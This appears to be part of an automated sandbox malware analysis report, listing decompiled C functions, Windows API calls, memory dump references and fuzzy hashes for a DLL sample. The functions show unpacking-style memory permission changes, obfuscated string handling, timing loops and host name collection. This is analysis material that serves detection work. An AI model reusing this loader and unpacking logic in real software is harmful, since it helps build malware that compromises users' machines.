                                          C-Code - Quality: 100%
                                          			E00C790A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0xc7d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0xc7d1a8 = GetTickCount();
				_t7 = E00C76A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E00C71C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E00C79511(_t15) != 0) {
						 *0xc7d260 = 1; // executed
					}
					_t13 = E00C74908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x00c790a1
                                          0x00c790aa
                                          0x00c790b0
                                          0x00c790b7
                                          0x00c790bb
                                          0x00000000
                                          0x00c790bb
                                          0x00c790c8
                                          0x00c790cd
                                          0x00c790d4
                                          0x00c790d8
                                          0x00c790e4
                                          0x00c790e8
                                          0x00c790f7
                                          0x00c790fd
                                          0x00c7910b
                                          0x00c7910d
                                          0x00c7910d
                                          0x00c79117
                                          0x00000000
                                          0x00c79117
                                          0x00c7911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,00C76F11,?), ref: 00C790AA
                                          • GetTickCount.KERNEL32 ref: 00C790BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 00C790D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 00C790F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 634ce0dce22c2761bd4ef041d0586dd9fcfc86e88b123b31f348752e1a2e029d
                                          • Instruction ID: 492adf615dc1ac0c42335209a71fae324c0496efc30418e01bac79533d1a578c
                                          • Opcode Fuzzy Hash: 634ce0dce22c2761bd4ef041d0586dd9fcfc86e88b123b31f348752e1a2e029d
                                          • Instruction Fuzzy Hash: E8F0F631640302ABD7106B749C89B4E36B4FF44395F00C025F80DD7261EB30C881D6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C768CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C768CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E00C79138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xc7d2a4; // 0x24ba5a8
				_t4 = _t24 + 0xc7ede0; // 0x3139388
				_t5 = _t24 + 0xc7ed88; // 0x4f0053
				_t26 = E00C71B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xc7d2a4; // 0x24ba5a8
						_t11 = _t32 + 0xc7edd4; // 0x313937c
						_t48 = _t11;
						_t12 = _t32 + 0xc7ed88; // 0x4f0053
						_t51 = E00C75FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0xc7d2a4; // 0x24ba5a8
							_t13 = _t35 + 0xc7ea59; // 0x30314549
							if(E00C775E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0xc7d25c - 6;
								if( *0xc7d25c <= 6) {
									_t42 =  *0xc7d2a4; // 0x24ba5a8
									_t15 = _t42 + 0xc7ec3a; // 0x52384549
									E00C775E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0xc7d2a4; // 0x24ba5a8
							_t17 = _t38 + 0xc7ee18; // 0x31393c0
							_t18 = _t38 + 0xc7edf0; // 0x680043
							_t40 = E00C71BC1(_v8, 0x80000001, _t51, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xc7d238, 0, _t51);
						}
					}
					HeapFree( *0xc7d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E00C7568A(_t53);
				}
				return _t45;
			}


















                                          0x00c768df
                                          0x00c768e2
                                          0x00c768e9
                                          0x00c768eb
                                          0x00c768eb
                                          0x00c768ee
                                          0x00c768f3
                                          0x00c768fa
                                          0x00c76907
                                          0x00c7690c
                                          0x00c76910
                                          0x00c7691e
                                          0x00c7692c
                                          0x00c76930
                                          0x00c769c1
                                          0x00c769c1
                                          0x00c76936
                                          0x00c76936
                                          0x00c7693b
                                          0x00c7693b
                                          0x00c76942
                                          0x00c7694e
                                          0x00c76950
                                          0x00c76952
                                          0x00c76954
                                          0x00c7695b
                                          0x00c7696d
                                          0x00c7696f
                                          0x00c76976
                                          0x00c76978
                                          0x00c7697f
                                          0x00c7698a
                                          0x00c7698a
                                          0x00c76976
                                          0x00c7698f
                                          0x00c76994
                                          0x00c7699b
                                          0x00c769ab
                                          0x00c769b9
                                          0x00c769bb
                                          0x00c769bb
                                          0x00c76952
                                          0x00c769cd
                                          0x00c769cd
                                          0x00c769cf
                                          0x00c769d4
                                          0x00c769d6
                                          0x00c769d6
                                          0x00c769e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03139388,00000000,?,7519F710,00000000,7519F730), ref: 00C7691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031393C0,?,00000000,30314549,00000014,004F0053,0313937C), ref: 00C769BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C79C10), ref: 00C769CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 9971ab774e346ef473075de076f743330b8f700d00f4a1575aefd16f5fd35bb1
                                          • Instruction ID: 545dba2106ecabdb00fa9d9f9342a4ef8f760a731195005d17476e3032e2a832
                                          • Opcode Fuzzy Hash: 9971ab774e346ef473075de076f743330b8f700d00f4a1575aefd16f5fd35bb1
                                          • Instruction Fuzzy Hash: FA318F32A00109AFDB21EBA4DC85FAE7BBCEF48744F0540A5B60DAB121D7709E45EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C79F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E00C79F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0xc7d2a4; // 0x24ba5a8
				_push(0x800);
				_push(0);
				_push( *0xc7d238);
				_t1 = _t43 + 0xc7e791; // 0x6976612e
				_t44 = _t1;
				if( *0xc7d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0xc7d24c =  *0xc7d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00C77CF7(_a4, _t41); // executed
						_t19 = E00C760CF(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0xc7d24c < 5) {
								 *0xc7d24c =  *0xc7d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E00C76106();
						RtlFreeHeap( *0xc7d238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E00C7514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E00C71754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}













                                          0x00c79f11
                                          0x00c79f11
                                          0x00c79f14
                                          0x00c79f15
                                          0x00c79f1f
                                          0x00c79f26
                                          0x00c79f2b
                                          0x00c79f2d
                                          0x00c79f33
                                          0x00c79f33
                                          0x00c79f39
                                          0x00c79f61
                                          0x00c79f79
                                          0x00c79f7b
                                          0x00c79f7c
                                          0x00c79f7e
                                          0x00c79fbc
                                          0x00c79fbc
                                          0x00c79fc2
                                          0x00c79fc8
                                          0x00c79fc8
                                          0x00c79f80
                                          0x00c79f86
                                          0x00c79f89
                                          0x00c79f98
                                          0x00c79f9a
                                          0x00c79fa1
                                          0x00c79fd5
                                          0x00c79fda
                                          0x00c79fdc
                                          0x00c79fde
                                          0x00c79fde
                                          0x00000000
                                          0x00c79fdc
                                          0x00c79fa3
                                          0x00c79fa8
                                          0x00c79fb6
                                          0x00000000
                                          0x00c79fb6
                                          0x00c79f70
                                          0x00c79f75
                                          0x00c79f75
                                          0x00000000
                                          0x00c79f75
                                          0x00c79f3b
                                          0x00c79f43
                                          0x00000000
                                          0x00000000
                                          0x00c79f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C79F3B
                                            • Part of subcall function 00C71754: GetTickCount.KERNEL32 ref: 00C71768
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C717B8
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C717D5
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C71801
                                            • Part of subcall function 00C71754: HeapFree.KERNEL32(00000000,?), ref: 00C71813
                                            • Part of subcall function 00C71754: wsprintfA.USER32 ref: 00C71834
                                            • Part of subcall function 00C71754: HeapFree.KERNEL32(00000000,?), ref: 00C71844
                                            • Part of subcall function 00C71754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C71872
                                            • Part of subcall function 00C71754: GetTickCount.KERNEL32 ref: 00C71883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C79F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,00C79C62,00000002,?,?,?,?), ref: 00C79FB6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 1943b04170b1ee7a831c9ccc6f9a5d110f858164e8000ae843a81eb62f58f747
                                          • Instruction ID: 6714b747cb06ca04340a55aab03c79489b757d32ec6c96cc32edeec615e2cb43
                                          • Opcode Fuzzy Hash: 1943b04170b1ee7a831c9ccc6f9a5d110f858164e8000ae843a81eb62f58f747
                                          • Instruction Fuzzy Hash: EC215C72200205EBCB119FA9DC40B9E37BCEF49345F108015F90AD7261DB70EE869BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1EB4, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E005F1EB4(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}















                                          0x005f1ebe
                                          0x005f1ec3
                                          0x005f1ecf
                                          0x005f1edc
                                          0x005f1ee2
                                          0x005f1ee4
                                          0x005f1eea
                                          0x005f1f57
                                          0x005f1f5e
                                          0x005f1f5e
                                          0x005f1eec
                                          0x005f1eef
                                          0x005f1eef
                                          0x005f1ef3
                                          0x00000000
                                          0x00000000
                                          0x005f1ef5
                                          0x005f1ef9
                                          0x005f1f11
                                          0x005f1f15
                                          0x005f1f29
                                          0x005f1f17
                                          0x005f1f17
                                          0x005f1f1d
                                          0x005f1f21
                                          0x005f1f21
                                          0x005f1efb
                                          0x005f1efb
                                          0x005f1f07
                                          0x005f1f0c
                                          0x005f1f0c
                                          0x005f1f3a
                                          0x005f1f3e
                                          0x005f1f46
                                          0x005f1f46
                                          0x005f1f49
                                          0x005f1f4c
                                          0x005f1f4f
                                          0x005f1f55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f1f55
                                          0x00000000

                                          APIs
                                          • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 005F1EE2
                                          • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 005F1F3A
                                          • GetLastError.KERNEL32 ref: 005F1F40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          • Opcode ID: d5242885fc0e3101a9495d3b65d7757ab847984f031cc33576a0a2b63d30ff54
                                          • Instruction ID: 02814c5e45530ba1c629e95c0080ecf1a42b097e9d242d7f8669135cf099f396
                                          • Opcode Fuzzy Hash: d5242885fc0e3101a9495d3b65d7757ab847984f031cc33576a0a2b63d30ff54
                                          • Instruction Fuzzy Hash: CB21C07290020DEFEB20CF94CC80EBDBBB8FF14314F200559E6409B142D3789A88DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F16E4, Relevance: 4.6, APIs: 3, Instructions: 62stringthreadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E005F16E4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x5f4144;
				if( *0x5f412c > 5) {
					_t16 = _t15 + 0x5f50f4;
				} else {
					_t16 = _t15 + 0x5f50b1;
				}
				E005F1000(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E005F1D86( &_v32,  &_v16,  *0x5f4140 ^ 0xc786104c) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x5f4138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E005F10FC(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x5f4138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E005F1ADC(_v28); // executed
				}
				ExitThread(_t25);
			}

















                                          0x005f16ea
                                          0x005f16fb
                                          0x005f1705
                                          0x005f16fd
                                          0x005f16fd
                                          0x005f16fd
                                          0x005f170c
                                          0x005f1715
                                          0x005f171a
                                          0x005f1738
                                          0x005f1793
                                          0x005f173a
                                          0x005f1740
                                          0x005f1746
                                          0x005f1746
                                          0x005f1754
                                          0x005f1758
                                          0x005f175f
                                          0x005f1761
                                          0x005f1765
                                          0x005f1767
                                          0x005f176e
                                          0x005f1782
                                          0x005f1770
                                          0x005f1776
                                          0x005f177b
                                          0x005f176e
                                          0x005f178a
                                          0x005f178a
                                          0x005f1795

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?), ref: 005F1740
                                          • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 005F1776
                                          • ExitThread.KERNEL32 ref: 005F1795
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ExitThreadlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3726537860-0
                                          • Opcode ID: 023f059c230c53e5c6223180723e6956ddb1988fd867d4d9284e5f3b44c2d221
                                          • Instruction ID: c5f63b23b96bfdee9f3abeb007484d86d136f6392194bc2e3306c51ece7cace3
                                          • Opcode Fuzzy Hash: 023f059c230c53e5c6223180723e6956ddb1988fd867d4d9284e5f3b44c2d221
                                          • Instruction Fuzzy Hash: 3011AC71505A0AEBD710EB71CD8CEB77BECFB54350F100819B649C30A1EB29E648DB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E00C7642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00C74FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xc7d2a4; // 0x24ba5a8
						_t20 = _t68 + 0xc7e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00C75103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x00c76432
                                          0x00c76435
                                          0x00c76445
                                          0x00c7644e
                                          0x00c76452
                                          0x00c76520
                                          0x00c76526
                                          0x00c76526
                                          0x00c7646c
                                          0x00c76471
                                          0x00c76475
                                          0x00c7647b
                                          0x00c76480
                                          0x00c76487
                                          0x00c76496
                                          0x00c76496
                                          0x00c7649a
                                          0x00c7649c
                                          0x00c764a8
                                          0x00c764b3
                                          0x00c764be
                                          0x00c764c2
                                          0x00c764cc
                                          0x00c764d0
                                          0x00c764d2
                                          0x00c764d7
                                          0x00c764de
                                          0x00c764ee
                                          0x00c764ee
                                          0x00c764d7
                                          0x00c764d0
                                          0x00c764f0
                                          0x00c764f5
                                          0x00c764fa
                                          0x00c764fa
                                          0x00c764fd
                                          0x00c76506
                                          0x00c7650b
                                          0x00c7650b
                                          0x00c76510
                                          0x00c76515
                                          0x00c76515
                                          0x00c76510
                                          0x00c7649a
                                          0x00c76517
                                          0x00c7651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00C74FFA: SysAllocString.OLEAUT32(80000002), ref: 00C75057
                                            • Part of subcall function 00C74FFA: SysFreeString.OLEAUT32(00000000), ref: 00C750BD
                                          • SysFreeString.OLEAUT32(?), ref: 00C7650B
                                          • SysFreeString.OLEAUT32(00C7A6F4), ref: 00C76515
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 3f0a58f574ebd61123bcc9dbdede31c0e80eaaca407e4f4f76e29dd22a34e3ef
                                          • Instruction ID: 3e4faa7ccec0a79802ba13a6c4a7b98baca640d72da9bbdac9e10ab5d4f5f239
                                          • Opcode Fuzzy Hash: 3f0a58f574ebd61123bcc9dbdede31c0e80eaaca407e4f4f76e29dd22a34e3ef
                                          • Instruction Fuzzy Hash: 59314972500559AFCB25DFA8C888C9FBB79FFC97407148658F81A9B214E331ED91DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C76C68, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00C79642), ref: 00C76C81
                                            • Part of subcall function 00C7642C: SysFreeString.OLEAUT32(?), ref: 00C7650B
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C76CC2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 42a100c654f2e1a8d5da8e81d602a630b002160e9694b13d951601ab0b03f4f4
                                          • Instruction ID: 32598bc14b2543cd9a8dfe9350b08e31bdb87e038abf5238435eb7468f1dc222
                                          • Opcode Fuzzy Hash: 42a100c654f2e1a8d5da8e81d602a630b002160e9694b13d951601ab0b03f4f4
                                          • Instruction Fuzzy Hash: A4014B3650010ABFCB019FA9D904AAF7BB9EF48714B018066FA0DE7121E7309E559BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C773E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00C773E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00C758BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00C7147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x00c773ee
                                          0x00c773f9
                                          0x00c773fb
                                          0x00c77401
                                          0x00c77403
                                          0x00c77408
                                          0x00c77411
                                          0x00c77415
                                          0x00c7741e
                                          0x00c77422
                                          0x00c77431
                                          0x00c77424
                                          0x00c77425
                                          0x00c7742a
                                          0x00c7742a
                                          0x00c77422
                                          0x00c77415
                                          0x00c7743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,00C751DC,7519F710,00000000,?,?,00C751DC), ref: 00C77401
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,00C751DC,00C751DD,?,?,00C751DC), ref: 00C7741E
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 582854206757ee798c148ce2a1b5b8960cb23ba102395ed8edecf7cac8cf954b
                                          • Instruction ID: 875197d55f6b939d1293cff835d6188faef4dfa08268a361e3e9fa6811ea61c3
                                          • Opcode Fuzzy Hash: 582854206757ee798c148ce2a1b5b8960cb23ba102395ed8edecf7cac8cf954b
                                          • Instruction Fuzzy Hash: E0F0B436B0410DBAE710DABA8C01FAF7ABCDBC4740F204159A91CE3140EA70DF019BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

